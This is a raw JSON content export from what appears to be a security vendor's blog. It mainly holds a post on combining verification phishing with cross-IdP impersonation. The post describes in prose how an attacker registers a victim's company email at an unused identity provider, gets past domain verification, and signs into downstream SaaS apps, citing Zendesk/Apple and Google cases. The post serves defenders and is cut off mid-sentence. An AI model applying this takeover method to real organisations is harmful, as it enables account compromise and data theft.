},[178843],{"type":370},{"data":178845,"content":178846,"nodeType":178},{},[178847],{"data":178848,"marks":178849,"value":4394,"nodeType":173},{},[],{"data":178851,"content":178852,"nodeType":178},{},[178853],{"data":178854,"marks":178855,"value":4401,"nodeType":173},{},[],{"data":178857,"content":178858,"nodeType":178},{},[178859,178862,178869],{"data":178860,"marks":178861,"value":4408,"nodeType":173},{},[],{"data":178863,"content":178864,"nodeType":186},{"uri":4411},[178865],{"data":178866,"marks":178867,"value":4417,"nodeType":173},{},[178868],{"type":194},{"data":178870,"marks":178871,"value":4421,"nodeType":173},{},[],{"data":178873,"content":178876,"nodeType":312},{"target":178874},{"sys":178875},{"id":4426,"type":317,"linkType":318},[],{"data":178878,"content":178879,"nodeType":231},{},[],{"data":178881,"content":178882,"nodeType":169},{},[178883],{"data":178884,"marks":178885,"value":4438,"nodeType":173},{},[178886],{"type":370},{"data":178888,"content":178889,"nodeType":235},{},[178890],{"data":178891,"marks":178892,"value":4446,"nodeType":173},{},[178893],{"type":370},{"data":178895,"content":178896,"nodeType":178},{},[178897],{"data":178898,"marks":178899,"value":4453,"nodeType":173},{},[],{"data":178901,"content":178902,"nodeType":250},{},[178903,178922,178941,178970],{"data":178904,"content":178905,"nodeType":254},{},[178906],{"data":178907,"content":178908,"nodeType":178},{},[178909,178912,178919],{"data":178910,"marks":178911,"value":4466,"nodeType":173},{},[],{"data":178913,"content":178914,"nodeType":186},{"uri":4469},[178915],{"data":178916,"marks":178917,"value":4475,"nodeType":173},{},[178918],{"type":194},{"data":178920,"marks":178921,"value":4479,"nodeType":173},{},[],{"data":178923,"content":178924,"nodeType":254},{},[178925],{"data":178926,"content":178927,"nodeType":178},{},[178928,178931,178938],{"data":178929,"marks":178930,"value":4489,"nodeType":173},{},[],{"data":178932,"content":178933,"nodeType":186},{"uri":4492},[178934],{"data":178935,"marks":178936,"value":4498,"nodeType":173},{},[178937],{"type":194},{"data":178939,"marks":178940,"value":1477,"nodeType":173},{},[],{"data":178942,"content":178943,"nodeType":254},{},[178944],{"data":178945,"content":178946,"nodeType":178},{},[178947,178950,178957,178960,178967],{"data":178948,"marks":178949,"value":4511,"nodeType":173},{},[],{"data":178951,"content":178952,"nodeType":186},{"uri":4342},[178953],{"data":178954,"marks":178955,"value":4519,"nodeType":173},{},[178956],{"type":194},{"data":178958,"marks":178959,"value":4523,"nodeType":173},{},[],{"data":178961,"content":178962,"nodeType":186},{"uri":4526},[178963],{"data":178964,"marks":178965,"value":4532,"nodeType":173},{},[178966],{"type":194},{"data":178968,"marks":178969,"value":4536,"nodeType":173},{},[],{"data":178971,"content":178972,"nodeType":254},{},[178973],{"data":178974,"content":178975,"nodeType":178},{},[178976,178979,178986],{"data":178977,"marks":178978,"value":4546,"nodeType":173},{},[],{"data":178980,"content":178981,"nodeType":186},{"uri":4492},[178982],{"data":178983,"marks":178984,"value":4554,"nodeType":173},{},[178985],{"type":194},{"data":178987,"marks":178988,"value":4558,"nodeType":173},{},[],{"data":178990,"content":178991,"nodeType":178},{},[178992],{"data":178993,"marks":178994,"value":4565,"nodeType":173},{},[],{"data":178996,"content":178997,"nodeType":235},{},[178998],{"data":178999,"marks":179000,"value":4573,"nodeType":173},{},[179001],{"type":370},{"data":179003,"content":179004,"nodeType":178},{},[179005],{"data":179006,"marks":179007,"value":4580,"nodeType":173},{},[],{"data":179009,"content":179010,"nodeType":178},{},[179011],{"data":179012,"marks":179013,"value":4587,"nodeType":173},{},[],{"data":179015,"content":179018,"nodeType":312},{"target":179016},{"sys":179017},{"id":4592,"type":317,"linkType":318},[],{"data":179020,"content":179021,"nodeType":235},{},[179022],{"data":179023,"marks":179024,"value":4601,"nodeType":173},{},[179025],{"type":370},{"data":179027,"content":179028,"nodeType":178},{},[179029],{"data":179030,"marks":179031,"value":4608,"nodeType":173},{},[],{"data":179033,"content":179034,"nodeType":178},{},[179035],{"data":179036,"marks":179037,"value":4615,"nodeType":173},{},[],{"data":179039,"content":179040,"nodeType":178},{},[179041],{"data":179042,"marks":179043,"value":4622,"nodeType":173},{},[],{"data":179045,"content":179046,"nodeType":235},{},[179047],{"data":179048,"marks":179049,"value":4630,"nodeType":173},{},[179050],{"type":370},{"data":179052,"content":179053,"nodeType":178},{},[179054],{"data":179055,"marks":179056,"value":4637,"nodeType":173},{},[],{"data":179058,"content":179059,"nodeType":178},{},[179060],{"data":179061,"marks":179062,"value":4644,"nodeType":173},{},[],{"data":179064,"content":179065,"nodeType":178},{},[179066],{"data":179067,"marks":179068,"value":4651,"nodeType":173},{},[],{"data":179070,"content":179071,"nodeType":178},{},[179072],{"data":179073,"marks":179074,"value":4658,"nodeType":173},{},[],{"data":179076,"content":179079,"nodeType":312},{"target":179077},{"sys":179078},{"id":4663,"type":317,"linkType":318},[],{"data":179081,"content":179082,"nodeType":231},{},[],{"data":179084,"content":179085,"nodeType":169},{},[179086],{"data":179087,"marks":179088,"value":4675,"nodeType":173},{},[179089],{"type":370},{"data":179091,"content":179092,"nodeType":178},{},[179093],{"data":179094,"marks":179095,"value":4682,"nodeType":173},{},[],{"data":179097,"content":179098,"nodeType":250},{},[179099,179108,179117],{"data":179100,"content":179101,"nodeType":254},{},[179102],{"data":179103,"content":179104,"nodeType":178},{},[179105],{"data":179106,"marks":179107,"value":4695,"nodeType":173},{},[],{"data":179109,"content":179110,"nodeType":254},{},[179111],{"data":179112,"content":179113,"nodeType":178},{},[179114],{"data":179115,"marks":179116,"value":4705,"nodeType":173},{},[],{"data":179118,"content":179119,"nodeType":254},{},[179120],{"data":179121,"content":179122,"nodeType":178},{},[179123],{"data":179124,"marks":179125,"value":4715,"nodeType":173},{},[],{"data":179127,"content":179128,"nodeType":178},{},[179129],{"data":179130,"marks":179131,"value":4722,"nodeType":173},{},[],{"data":179133,"content":179134,"nodeType":178},{},[179135,179138,179144],{"data":179136,"marks":179137,"value":4729,"nodeType":173},{},[],{"data":179139,"content":179140,"nodeType":186},{"uri":4732},[179141],{"data":179142,"marks":179143,"value":4737,"nodeType":173},{},[],{"data":179145,"marks":179146,"value":4741,"nodeType":173},{},[],{"data":179148,"content":179149,"nodeType":178},{},[179150,179153,179160],{"data":179151,"marks":179152,"value":4748,"nodeType":173},{},[],{"data":179154,"content":179155,"nodeType":186},{"uri":4751},[179156],{"data":179157,"marks":179158,"value":4757,"nodeType":173},{},[179159],{"type":194},{"data":179161,"marks":179162,"value":4761,"nodeType":173},{},[],{"data":179164,"content":179167,"nodeType":312},{"target":179165},{"sys":179166},{"id":4766,"type":317,"linkType":318},[],{"data":179169,"content":179170,"nodeType":178},{},[179171],{"data":179172,"marks":179173,"value":37,"nodeType":173},{},[],{"entries":179175},{"hyperlink":179176,"inline":179177,"block":179178},[],[],[179179,179203,179205,179212,179215,179219,179226],{"sys":179180,"__typename":5311,"content":179181,"name":179202,"title":118},{"id":3988},{"json":179182},{"nodeType":165,"data":179183,"content":179184},{},[179185],{"nodeType":178,"data":179186,"content":179187},{},[179188,179192,179199],{"nodeType":173,"value":179189,"marks":179190,"data":179191},"The attackers behind this campaign went on a worldwide hacking spree in 2025, taking on the moniker of \"Scattered Lapsus$ Hunters\" and launching attacks on Marks & Spencer, Co-op, Jaguar Land Rover, and hundreds of Salesforce customers. ",[],{},{"nodeType":186,"data":179193,"content":179194},{"uri":5002},[179195],{"nodeType":173,"value":179196,"marks":179197,"data":179198},"Check out the blog post for all the details. ",[],{},{"nodeType":173,"value":37,"marks":179200,"data":179201},[],{},"Snowflake insight box 1",{"sys":179204,"__typename":15269,"type":15270,"ctaText":151924,"buttonLabel":67302,"buttonColour":72847,"buttonUrl":77262},{"id":4028},{"sys":179206,"__typename":5345,"title":179207,"caption":179208,"layoutMode":118,"file":179209},{"id":4290},"Snowflake attack path","Attack path traversed in the attacks on Snowflake customers",{"url":179210,"width":179211,"height":46382},"https://images.ctfassets.net/y1cdw1ablpvd/4cjVqskN2svdMLJpOkAGxq/057ec00e3b9965534e5ffeff5b423744/Snowflake_Attack_Path__3_.png",6140,{"sys":179213,"__typename":15269,"type":15270,"ctaText":179214,"buttonLabel":123357,"buttonColour":72847,"buttonUrl":126102},{"id":4426},"Read our blog post to learn more about the rise of infostealers and their role in the credential theft ecosystem. ",{"sys":179216,"__typename":15269,"type":15270,"ctaText":179217,"buttonLabel":179218,"buttonColour":152046,"buttonUrl":4732},{"id":4592},"Find out how Push helps you to cut through the noise of TI feeds with its validated stolen credentials feature, enabling you to pinpoint and remediate vulnerable accounts. ","Read the Feature Release",{"sys":179220,"__typename":127689,"title":179221,"youTubeUrl":179222,"imagePlaceholder":179223},{"id":4663},"Snowflake: The tip of the iceberg – Three practical takeaways from the Snowflake incident","https://www.youtube.com/watch?v=0s0NB4L7oKU",{"url":179224,"width":11942,"height":179225},"https://images.ctfassets.net/y1cdw1ablpvd/6DHHMV4gUPSKU36Jzyf0ei/458ed0cc9e04c53b92daa96013ada0d8/Twitter-X_-_1200_x_680.png",675,{"sys":179227,"__typename":15269,"type":112637,"ctaText":176118,"buttonLabel":176108,"buttonColour":15273,"buttonUrl":1469},{"id":4766},"content:blog:snowflake-retro.json","blog/snowflake-retro.json","blog/snowflake-retro",{"_path":179232,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":179233,"ogImage":118,"summary":179236,"title":179255,"subtitle":118,"metaTitle":179256,"synopsis":179257,"hashTags":118,"publishedDate":179258,"slug":179259,"tagsCollection":179260,"relatedBlogPostsCollection":179266,"authorsCollection":181153,"content":181157,"_id":182539,"_type":5439,"_source":5440,"_file":182540,"_stem":182541,"_extension":5439},"/blog/a-new-class-of-phishing-verification-phishing-and-cross-idp-impersonation",{"id":179234,"publishedAt":179235},"6aIClLltBiYMQYgKtQcKqz","2024-11-26T09:10:03.805Z",{"json":179237},{"data":179238,"content":179239,"nodeType":165},{},[179240],{"data":179241,"content":179242,"nodeType":178},{},[179243,179247,179251],{"data":179244,"marks":179245,"value":179246,"nodeType":173},{},[],"P",{"data":179248,"marks":179249,"value":179250,"nodeType":173},{},[],"hishing for email verification can be combined with cross-IdP impersonation gain direct access to downstream SaaS. ",{"data":179252,"marks":179253,"value":179254,"nodeType":173},{},[],"This means that accounts normally protected by strong SSO mechanisms using phishing-resistant MFA factors like passkeys or Okta Fastpass can be directly compromised through phishing a single OTP.","A new class of phishing: Verification phishing and cross-IdP impersonation","Combining Verification Phishing and Cross-IdP Impersonation","How phishing for email verification can be combined with cross-IdP impersonation to gain direct access to downstream SaaS and bypass hardened IdP accounts.\n","2024-11-23T00:00:00.000Z","a-new-class-of-phishing-verification-phishing-and-cross-idp-impersonation",{"items":179261},[179262,179264],{"sys":179263,"name":505},{"id":504},{"sys":179265,"name":509},{"id":508},{"items":179267},[179268,180172,180867],{"__typename":1528,"sys":179269,"content":179271,"title":180158,"synopsis":180159,"hashTags":118,"publishedDate":180160,"slug":180161,"tagsCollection":180162,"authorsCollection":180168},{"id":179270},"2PpB1KSjZkmpzYDhDLRBYx",{"json":179272},{"nodeType":165,"data":179273,"content":179274},{},[179275,179282,179289,179317,179324,179327,179334,179342,179362,179369,179376,179382,179389,179396,179419,179426,179433,179473,179480,179483,179490,179526,179532,179539,179546,179549,179557,179564,179597,179603,179610,179613,179621,179641,179648,179655,179673,179676,179684,179704,179711,179727,179742,179745,179753,179772,179779,179786,179879,179886,179891,179898,179905,179938,179945,179948,179956,179963,179970,180002,180009,180016,180019,180027,180046,180053,180060,180103,180109,180116,180134,180140,180146,180152],{"nodeType":178,"data":179276,"content":179277},{},[179278],{"nodeType":173,"value":179279,"marks":179280,"data":179281},"Two stories have hit the headlines in recent months involving attackers and researchers, demonstrating ways of taking over a SaaS account by accessing it using an SSO login from an IdP that you’ve never used before.",[],{},{"nodeType":178,"data":179283,"content":179284},{},[179285],{"nodeType":173,"value":179286,"marks":179287,"data":179288},"Yes, you read that right. An attacker created an IdP account on an IdP that you don’t use. And because the account matched your actual company domain, they used it to log into your actual downstream accounts on the apps that you use. ",[],{},{"nodeType":178,"data":179290,"content":179291},{},[179292,179296,179302,179306,179313],{"nodeType":173,"value":179293,"marks":179294,"data":179295},"We're calling this technique ",[],{},{"nodeType":186,"data":179297,"content":179298},{"uri":61697},[179299],{"nodeType":173,"value":74174,"marks":179300,"data":179301},[],{},{"nodeType":173,"value":179303,"marks":179304,"data":179305},". If you’re familiar with our other research, this is basically ",[],{},{"nodeType":186,"data":179307,"content":179308},{"uri":4342},[179309],{"nodeType":173,"value":835,"marks":179310,"data":179312},[179311],{"type":194},{},{"nodeType":173,"value":179314,"marks":179315,"data":179316}," on steroids — you’re effectively making your own! ",[],{},{"nodeType":178,"data":179318,"content":179319},{},[179320],{"nodeType":173,"value":179321,"marks":179322,"data":179323},"Let’s take a look at some examples.",[],{},{"nodeType":231,"data":179325,"content":179326},{},[],{"nodeType":169,"data":179328,"content":179329},{},[179330],{"nodeType":173,"value":179331,"marks":179332,"data":179333},"Cross-IdP impersonation in the wild",[],{},{"nodeType":235,"data":179335,"content":179336},{},[179337],{"nodeType":173,"value":179338,"marks":179339,"data":179341},"Spoofing Zendesk support emails and infiltrating connected apps (via Apple SSO)",[179340],{"type":370},{},{"nodeType":178,"data":179343,"content":179344},{},[179345,179349,179358],{"nodeType":173,"value":179346,"marks":179347,"data":179348},"A 15-year-old researcher was able to ",[],{},{"nodeType":186,"data":179350,"content":179352},{"uri":179351},"https://gist.github.com/hackermondev/68ec8ed145fcee49d2f5e2b9d2cf2e52",[179353],{"nodeType":173,"value":179354,"marks":179355,"data":179357},"access Zendesk support ticket history via spoofing a company’s support email, and later use it to access connected apps",[179356],{"type":194},{},{"nodeType":173,"value":179359,"marks":179360,"data":179361}," (Slack, in this case) via SSO, successfully targeting hundreds of companies.  ",[],{},{"nodeType":178,"data":179363,"content":179364},{},[179365],{"nodeType":173,"value":179366,"marks":179367,"data":179368},"The attack is based around the fact that Zendesk support tickets are easy to enumerate. The typical method of setting up Zendesk is to have your existing support email address (e.g. support@company.com) forward emails to Zendesk. ",[],{},{"nodeType":178,"data":179370,"content":179371},{},[179372],{"nodeType":173,"value":179373,"marks":179374,"data":179375},"The researcher was able to abuse this feature to create an account for an existing company domain on an IdP not currently being used by the company, and then use that account to authenticate to a third-party app used by the company. ",[],{},{"nodeType":312,"data":179377,"content":179381},{"target":179378},{"sys":179379},{"id":179380,"type":317,"linkType":318},"3A6fHQ0XB2qAjQdJGvAb9N",[],{"nodeType":178,"data":179383,"content":179384},{},[179385],{"nodeType":173,"value":179386,"marks":179387,"data":179388},"The researcher found that, although Zendesk had started blocking emails from ‘noreply@’ addresses (probably to prevent this kind of attack), Apple sent its verification emails from an ‘appleid@’ address, making the attack possible when using Apple IdP.",[],{},{"nodeType":178,"data":179390,"content":179391},{},[179392],{"nodeType":173,"value":179393,"marks":179394,"data":179395},"There’s a couple of things to note here:",[],{},{"nodeType":250,"data":179397,"content":179398},{},[179399,179409],{"nodeType":254,"data":179400,"content":179401},{},[179402],{"nodeType":178,"data":179403,"content":179404},{},[179405],{"nodeType":173,"value":179406,"marks":179407,"data":179408},"Apple could be swapped out for any IdP that doesn’t send verification emails from a ‘noreply@’ address.",[],{},{"nodeType":254,"data":179410,"content":179411},{},[179412],{"nodeType":178,"data":179413,"content":179414},{},[179415],{"nodeType":173,"value":179416,"marks":179417,"data":179418},"Slack could be swapped out for just about any downstream SaaS app. ",[],{},{"nodeType":178,"data":179420,"content":179421},{},[179422],{"nodeType":173,"value":179423,"marks":179424,"data":179425},"Taking a step back — what if an attacker had discovered this exploit? The researcher states that, after Zendesk refused to acknowledge the issue through its bug bounty program operated by HackerOne, he individually contacted ‘hundreds’ of affected organizations. ",[],{},{"nodeType":178,"data":179427,"content":179428},{},[179429],{"nodeType":173,"value":179430,"marks":179431,"data":179432},"So that’s hundreds of vulnerable organizations, and potentially tens to hundreds of business apps per victim organization that could be accessed via Apple SSO. Any app that allows ‘sign in with Apple’ could be targeted where:",[],{},{"nodeType":250,"data":179434,"content":179435},{},[179436,179455],{"nodeType":254,"data":179437,"content":179438},{},[179439],{"nodeType":178,"data":179440,"content":179441},{},[179442,179446,179451],{"nodeType":173,"value":179443,"marks":179444,"data":179445},"An app with an ",[],{},{"nodeType":173,"value":179447,"marks":179448,"data":179450},"existing",[179449],{"type":194},{},{"nodeType":173,"value":179452,"marks":179453,"data":179454}," account belonging to the specific email & domain combination could be taken over.",[],{},{"nodeType":254,"data":179456,"content":179457},{},[179458],{"nodeType":178,"data":179459,"content":179460},{},[179461,179464,179469],{"nodeType":173,"value":15816,"marks":179462,"data":179463},[],{},{"nodeType":173,"value":179465,"marks":179466,"data":179468},"new",[179467],{"type":194},{},{"nodeType":173,"value":179470,"marks":179471,"data":179472}," account could also be created on apps allowing anyone with a company email to join the company tenant. ",[],{},{"nodeType":178,"data":179474,"content":179475},{},[179476],{"nodeType":173,"value":179477,"marks":179478,"data":179479},"It’s unclear whether Zendesk will have implemented a global fix for the issue either, as the vulnerability stems from a configuration option that could be remediated by disabling email collaboration, but is on by default. ",[],{},{"nodeType":231,"data":179481,"content":179482},{},[],{"nodeType":235,"data":179484,"content":179485},{},[179486],{"nodeType":173,"value":179487,"marks":179488,"data":179489},"Google domain verification bug similarities",[],{},{"nodeType":178,"data":179491,"content":179492},{},[179493,179497,179506,179510,179515,179518,179523],{"nodeType":173,"value":179494,"marks":179495,"data":179496},"The Zendesk attack shares some similarities with ",[],{},{"nodeType":186,"data":179498,"content":179500},{"uri":179499},"https://krebsonsecurity.com/2024/07/crooks-bypassed-googles-email-verification-to-create-workspace-accounts-access-3rd-party-services/",[179501],{"nodeType":173,"value":179502,"marks":179503,"data":179505},"a recent (now resolved) Google email verification vulnerability",[179504],{"type":194},{},{"nodeType":173,"value":179507,"marks":179508,"data":179509}," which allowed a newly created Google account/domain to be used to authenticate to downstream apps via SSO — ",[],{},{"nodeType":173,"value":179511,"marks":179512,"data":179514},"this time",[179513],{"type":370},{},{"nodeType":173,"value":3107,"marks":179516,"data":179517},[],{},{"nodeType":173,"value":179519,"marks":179520,"data":179522},"without verifying ownership of the domain",[179521],{"type":370},{},{"nodeType":173,"value":197,"marks":179524,"data":179525},[],{},{"nodeType":312,"data":179527,"content":179531},{"target":179528},{"sys":179529},{"id":179530,"type":317,"linkType":318},"6EeN0uKbhz9daUOo4E6wzR",[],{"nodeType":178,"data":179533,"content":179534},{},[179535],{"nodeType":173,"value":179536,"marks":179537,"data":179538},"Whereas the Zendesk attack took advantage of Apple email configs, this attack was much more direct in that Google enabled SSO to downstream apps prior to domain verification. ",[],{},{"nodeType":178,"data":179540,"content":179541},{},[179542],{"nodeType":173,"value":179543,"marks":179544,"data":179545},"The Google attack is definitely a bug rather than abusing a feature, and has since been patched. But, we’re starting to see a concerning pattern emerge. ",[],{},{"nodeType":231,"data":179547,"content":179548},{},[],{"nodeType":169,"data":179550,"content":179551},{},[179552],{"nodeType":173,"value":179553,"marks":179554,"data":179556},"How big of a problem is this?",[179555],{"type":370},{},{"nodeType":178,"data":179558,"content":179559},{},[179560],{"nodeType":173,"value":179561,"marks":179562,"data":179563},"First, let’s recap the general attack path:",[],{},{"nodeType":250,"data":179565,"content":179566},{},[179567,179577,179587],{"nodeType":254,"data":179568,"content":179569},{},[179570],{"nodeType":178,"data":179571,"content":179572},{},[179573],{"nodeType":173,"value":179574,"marks":179575,"data":179576},"The attacker signs up for an account on an app that functions as an IdP, linking it to the victim’s existing company email address via the ‘use existing email’ option.",[],{},{"nodeType":254,"data":179578,"content":179579},{},[179580],{"nodeType":178,"data":179581,"content":179582},{},[179583],{"nodeType":173,"value":179584,"marks":179585,"data":179586},"The attacker either bypasses domain verification or verifies the domain via email (typically by clicking a link or entering a one-time password) either through an attack like the ones above, or by social engineering the victim user.",[],{},{"nodeType":254,"data":179588,"content":179589},{},[179590],{"nodeType":178,"data":179591,"content":179592},{},[179593],{"nodeType":173,"value":179594,"marks":179595,"data":179596},"The attacker logs into an account on a downstream app using the ‘sign in with …’ SSO login option. ",[],{},{"nodeType":312,"data":179598,"content":179602},{"target":179599},{"sys":179600},{"id":179601,"type":317,"linkType":318},"5lz0Nqq3j3Q1XasHYszRXy",[],{"nodeType":178,"data":179604,"content":179605},{},[179606],{"nodeType":173,"value":179607,"marks":179608,"data":179609},"Let’s look more closely at why this is a cause for concern.",[],{},{"nodeType":231,"data":179611,"content":179612},{},[],{"nodeType":235,"data":179614,"content":179615},{},[179616],{"nodeType":173,"value":179617,"marks":179618,"data":179620},"It gets around your most hardened IdP accounts",[179619],{"type":370},{},{"nodeType":178,"data":179622,"content":179623},{},[179624,179628,179637],{"nodeType":173,"value":179625,"marks":179626,"data":179627},"The notion of IdP impersonation isn’t necessarily new. Take for example ",[],{},{"nodeType":186,"data":179629,"content":179631},{"uri":179630},"https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection",[179632],{"nodeType":173,"value":179633,"marks":179634,"data":179636},"cross-tenant impersonation",[179635],{"type":194},{},{"nodeType":173,"value":179638,"marks":179639,"data":179640},", which focuses on mapping an attacker-controlled Okta tenant to a compromised Okta tenant to give full access to connected user accounts and enable unrestricted lateral movement.",[],{},{"nodeType":178,"data":179642,"content":179643},{},[179644],{"nodeType":173,"value":179645,"marks":179646,"data":179647},"Cross-IdP impersonation, however, doesn’t require that you’ve already compromised an IdP admin account. You pick a user account (or multiple) that you want to take over, you enroll them with a new IdP matching the tenant and address structure, and then authenticate to whichever apps you’re interested in taking over. ",[],{},{"nodeType":178,"data":179649,"content":179650},{},[179651],{"nodeType":173,"value":179652,"marks":179653,"data":179654},"So, compromising your target’s main IdP isn’t necessary when the data and functionality that you’re most interested in lives in downstream apps. This means that even if your primary IdP is super locked down with phishing-resistant authentication (e.g. passkeys) this technique enables attackers to get around it. ",[],{},{"nodeType":178,"data":179656,"content":179657},{},[179658,179662,179670],{"nodeType":173,"value":179659,"marks":179660,"data":179661},"And a smart attacker who does their OSINT will identify potential app admins whose accounts to mirror, eliminating any noise that would be generated by privilege escalation & lateral movement attempts such as ",[],{},{"nodeType":186,"data":179663,"content":179664},{"uri":106815},[179665],{"nodeType":173,"value":179666,"marks":179667,"data":179669},"in-app phishing.",[179668],{"type":194},{},{"nodeType":173,"value":10557,"marks":179671,"data":179672},[],{},{"nodeType":231,"data":179674,"content":179675},{},[],{"nodeType":235,"data":179677,"content":179678},{},[179679],{"nodeType":173,"value":179680,"marks":179681,"data":179683},"App-based prevention measures are inconsistent",[179682],{"type":370},{},{"nodeType":178,"data":179685,"content":179686},{},[179687,179691,179700],{"nodeType":173,"value":179688,"marks":179689,"data":179690},"It’s worth noting that this attack doesn’t work the same on all apps. At the point of using a new login method to access an app, ",[],{},{"nodeType":186,"data":179692,"content":179694},{"uri":179693},"https://auth0.com/docs/manage-users/user-accounts/user-account-linking",[179695],{"nodeType":173,"value":179696,"marks":179697,"data":179699},"it is considered best practice to require re-verification",[179698],{"type":194},{},{"nodeType":173,"value":179701,"marks":179702,"data":179703}," — for example by logging in with the original login method, or approving the request via an email code or link. ",[],{},{"nodeType":178,"data":179705,"content":179706},{},[179707],{"nodeType":173,"value":179708,"marks":179709,"data":179710},"Requiring re-authentication with the original login method is probably game over for the attacker, but if the attacker has already found a way of verifying a new IdP via email, the latter option is probably less of an obstacle. ",[],{},{"nodeType":178,"data":179712,"content":179713},{},[179714,179718,179723],{"nodeType":173,"value":179715,"marks":179716,"data":179717},"But not all apps follow these best practices around adding new login methods. We tested a range of the most popular apps that our customers use by creating an account, adding a password and an SSO method, and subsequently adding another SSO method using a different IdP, and ",[],{},{"nodeType":173,"value":179719,"marks":179720,"data":179722},"found that 60% (3 in 5) of the apps we tested do not require re-verification by default",[179721],{"type":370},{},{"nodeType":173,"value":179724,"marks":179725,"data":179726}," when adding a new SSO login method.",[],{},{"nodeType":3769,"data":179728,"content":179729},{},[179730],{"nodeType":178,"data":179731,"content":179732},{},[179733,179738],{"nodeType":173,"value":179734,"marks":179735,"data":179737},"60% (3 in 5) of the apps we tested do not require re-verification by default",[179736],{"type":370},{},{"nodeType":173,"value":179739,"marks":179740,"data":179741}," when adding a new SSO login method",[],{},{"nodeType":231,"data":179743,"content":179744},{},[],{"nodeType":235,"data":179746,"content":179747},{},[179748],{"nodeType":173,"value":179749,"marks":179750,"data":179752},"There are more IdPs than you realize",[179751],{"type":370},{},{"nodeType":178,"data":179754,"content":179755},{},[179756,179760,179768],{"nodeType":173,"value":179757,"marks":179758,"data":179759},"IdP accounts have always been a valuable target. Earlier this year we saw ",[],{},{"nodeType":186,"data":179761,"content":179762},{"uri":155679},[179763],{"nodeType":173,"value":179764,"marks":179765,"data":179767},"a dramatic spike in the attacks on Okta accounts",[179766],{"type":194},{},{"nodeType":173,"value":179769,"marks":179770,"data":179771},", for example. But these accounts are often well protected with strong credentials (or passkeys) and MFA. ",[],{},{"nodeType":178,"data":179773,"content":179774},{},[179775],{"nodeType":173,"value":179776,"marks":179777,"data":179778},"In contrast, cross-IdP impersonation gives attackers a way of getting the benefit of an IdP compromise without needing to take over a locked down IdP account. ",[],{},{"nodeType":178,"data":179780,"content":179781},{},[179782],{"nodeType":173,"value":179783,"marks":179784,"data":179785},"Apps accept a wide variety of SSO login options. An app might support any combination of, for example:",[],{},{"nodeType":250,"data":179787,"content":179788},{},[179789,179799,179809,179819,179829,179839,179849,179859,179869],{"nodeType":254,"data":179790,"content":179791},{},[179792],{"nodeType":178,"data":179793,"content":179794},{},[179795],{"nodeType":173,"value":179796,"marks":179797,"data":179798},"Log in with Google",[],{},{"nodeType":254,"data":179800,"content":179801},{},[179802],{"nodeType":178,"data":179803,"content":179804},{},[179805],{"nodeType":173,"value":179806,"marks":179807,"data":179808},"Log in with Facebook",[],{},{"nodeType":254,"data":179810,"content":179811},{},[179812],{"nodeType":178,"data":179813,"content":179814},{},[179815],{"nodeType":173,"value":179816,"marks":179817,"data":179818},"Log in with Apple",[],{},{"nodeType":254,"data":179820,"content":179821},{},[179822],{"nodeType":178,"data":179823,"content":179824},{},[179825],{"nodeType":173,"value":179826,"marks":179827,"data":179828},"Log in with X",[],{},{"nodeType":254,"data":179830,"content":179831},{},[179832],{"nodeType":178,"data":179833,"content":179834},{},[179835],{"nodeType":173,"value":179836,"marks":179837,"data":179838},"Log in with Microsoft",[],{},{"nodeType":254,"data":179840,"content":179841},{},[179842],{"nodeType":178,"data":179843,"content":179844},{},[179845],{"nodeType":173,"value":179846,"marks":179847,"data":179848},"Log in with GitHub",[],{},{"nodeType":254,"data":179850,"content":179851},{},[179852],{"nodeType":178,"data":179853,"content":179854},{},[179855],{"nodeType":173,"value":179856,"marks":179857,"data":179858},"Log in with Okta ",[],{},{"nodeType":254,"data":179860,"content":179861},{},[179862],{"nodeType":178,"data":179863,"content":179864},{},[179865],{"nodeType":173,"value":179866,"marks":179867,"data":179868},"Log in with SAML",[],{},{"nodeType":254,"data":179870,"content":179871},{},[179872],{"nodeType":178,"data":179873,"content":179874},{},[179875],{"nodeType":173,"value":179876,"marks":179877,"data":179878},"Log in with SSO",[],{},{"nodeType":178,"data":179880,"content":179881},{},[179882],{"nodeType":173,"value":179883,"marks":179884,"data":179885},"And there are many, many IdPs — probably more than you realize — all of which could potentially be hijacked by an attacker to impersonate your organization.  ",[],{},{"nodeType":312,"data":179887,"content":179890},{"target":179888},{"sys":179889},{"id":125630,"type":317,"linkType":318},[],{"nodeType":178,"data":179892,"content":179893},{},[179894],{"nodeType":173,"value":179895,"marks":179896,"data":179897},"But it’s not just about attackers creating new IdP accounts: What other IdPs might your users have inadvertently created? And are these accounts as securely configured as your primary company IdP (most commonly Okta, Microsoft Entra, or Google Workspace)?",[],{},{"nodeType":178,"data":179899,"content":179900},{},[179901],{"nodeType":173,"value":179902,"marks":179903,"data":179904},"In fact, there are a few different scenarios to be aware of here:",[],{},{"nodeType":250,"data":179906,"content":179907},{},[179908,179918,179928],{"nodeType":254,"data":179909,"content":179910},{},[179911],{"nodeType":178,"data":179912,"content":179913},{},[179914],{"nodeType":173,"value":179915,"marks":179916,"data":179917},"An attacker creates a new account on a previously unused IdP mapping to your company domain and email, and exploits a flaw to bypass domain verification.",[],{},{"nodeType":254,"data":179919,"content":179920},{},[179921],{"nodeType":178,"data":179922,"content":179923},{},[179924],{"nodeType":173,"value":179925,"marks":179926,"data":179927},"An attacker creates a new account on a previously unused IdP mapping to your company domain and email, and social engineers the target user to convince them to complete the domain verification request. ",[],{},{"nodeType":254,"data":179929,"content":179930},{},[179931],{"nodeType":178,"data":179932,"content":179933},{},[179934],{"nodeType":173,"value":179935,"marks":179936,"data":179937},"A legitimate user signs up for an account that functions as an IdP with their company email, using a weak password and no MFA. This account is later compromised by an attacker. ",[],{},{"nodeType":178,"data":179939,"content":179940},{},[179941],{"nodeType":173,"value":179942,"marks":179943,"data":179944},"In all of these cases, an attacker would be able to authenticate to downstream apps and take over user accounts. ",[],{},{"nodeType":231,"data":179946,"content":179947},{},[],{"nodeType":235,"data":179949,"content":179950},{},[179951],{"nodeType":173,"value":179952,"marks":179953,"data":179955},"We’re only scratching the surface of what’s possible",[179954],{"type":370},{},{"nodeType":178,"data":179957,"content":179958},{},[179959],{"nodeType":173,"value":179960,"marks":179961,"data":179962},"The Zendesk attack demonstrates a creative way of abusing an app’s functionality, combined with the way in which the Apple IdP is configured. ",[],{},{"nodeType":178,"data":179964,"content":179965},{},[179966],{"nodeType":173,"value":179967,"marks":179968,"data":179969},"It would be naive to suggest that similar issues don’t exist for other IdPs. Or that apps other than Zendesk don’t have features that can be exploited.",[],{},{"nodeType":178,"data":179971,"content":179972},{},[179973,179977,179986,179990,179998],{"nodeType":173,"value":179974,"marks":179975,"data":179976},"For example, we’ve previously documented 